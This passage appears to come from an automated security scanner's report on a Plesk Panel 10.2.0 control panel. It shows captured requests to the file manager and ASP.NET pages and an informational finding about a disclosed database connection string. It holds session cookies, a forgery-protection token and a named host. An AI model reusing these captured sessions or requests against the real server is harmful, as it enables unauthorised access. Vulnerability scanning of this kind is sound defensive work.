Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 1138

------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="cmd"

new_file
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="wizaction"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="filter"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page"

0
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page_size"

25
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="sort"

name
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="file"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="subcmd"


------WebKitFormBoundaryvcNELhCBJg408XAA--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:34:04 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:34:04 GMT
Connection: close
Content-Length: 23875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager_new_file/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="new_file">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   




<div class="filemanagerTitle">
   Create new file in <span class="name"><A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a></span>
</div>

<div class="formArea">
   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-upload_file_method" value="upload" > <label for="fid-upload_file_method">Upload file</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[0]"> <label for="fid-extract1">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[0]" id="fid-extract1" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[1]"> <label for="fid-extract2">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[1]" id="fid-extract2" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[2]"> <label for="fid-extract3">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[2]" id="fid-extract3" value="true"></td>
           </tr>
       </table>

   </td></tr></table></fieldset>

   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-create_file_method" value="upload" checked> <label for="fid-create_file_method">File creation</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">File name <span class="required">*</span></td>
               <td><input type="text" name="new_file" value=""></td>
           </tr>

           <tr>
               <td class="name">Use HTML template</td>
               <td><input type="checkbox" class="checkbox" name="htmltemplate" value="true"></td>
           </tr>

       </table>

   </td></tr></table></fieldset>
</div>






















<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">



   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter the file name and click to create it in the current directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);create_file_oC();;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);create_file_oC();;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);cancel_oC();;return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);cancel_oC();;return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

10. Database connection string disclosed  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/aspdotnet/

Issue detail

The following database connection string was disclosed in the response:

Issue background

A database connection string specifies information about a data source and the means of connecting to it. In web applications, connection strings are generally used by the application tier to connect to the back database used for storing application data. They are usually read from server-side configuration files or hard-coded into application source code.

Issue remediation

It is almost never necessary for applications to disclose database connection strings to clients. You should review the reason for the disclosure and prevent it from ever happening.

Request

GET /plesk/client@2/domain@1/hosting/aspdotnet/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:26 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:28 GMT
Connection: close
Content-Length: 46372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fshared-ssl%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>ASP.NET Configuration for Website</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
